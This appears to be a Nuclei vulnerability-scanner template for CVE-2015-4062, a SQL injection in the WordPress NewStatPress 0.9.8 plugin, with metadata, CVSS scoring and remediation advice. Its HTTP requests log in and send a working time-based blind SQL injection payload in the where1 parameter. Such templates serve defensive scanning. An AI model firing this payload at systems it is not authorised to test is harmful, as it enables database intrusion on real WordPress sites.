48 lines
1.6 KiB
YAML
48 lines
1.6 KiB
YAML
|
id: CVE-2015-4062
|
||
|
|
||
|
info:
|
||
|
name: WordPress NewStatPress 0.9.8 - SQL Injection
|
||
|
author: r3Y3r53
|
||
|
severity: critical
|
||
|
description: |
|
||
|
WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.
|
||
|
reference:
|
||
|
- https://packetstormsecurity.com/files/132038/
|
||
|
- https://wordpress.org/plugins/newstatpress
|
||
|
- http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-4062
|
||
|
remediation: |
|
||
|
Update to plugin version 0.9.9 or latest.
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||
|
cvss-score: 9.8
|
||
|
cve-id: CVE-2015-4062
|
||
|
cwe-id: CWE-89
|
||
|
metadata:
|
||
|
verified: "true"
|
||
|
tags: authenticated,cve,sqli,wp-plugin,newstatpress,packetstorm,cve2015,wordpress,wp
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /wp-login.php HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||
|
|
||
|
- |
|
||
|
GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
cookie-reuse: true
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'duration>=6'
|
||
|
- 'status_code == 200'
|
||
|
- 'contains(body_2, "newstatpress_page_nsp_search")'
|
||
|
condition: and
|
||
|
|
||
|
# Enhanced by md on 2023/03/13
|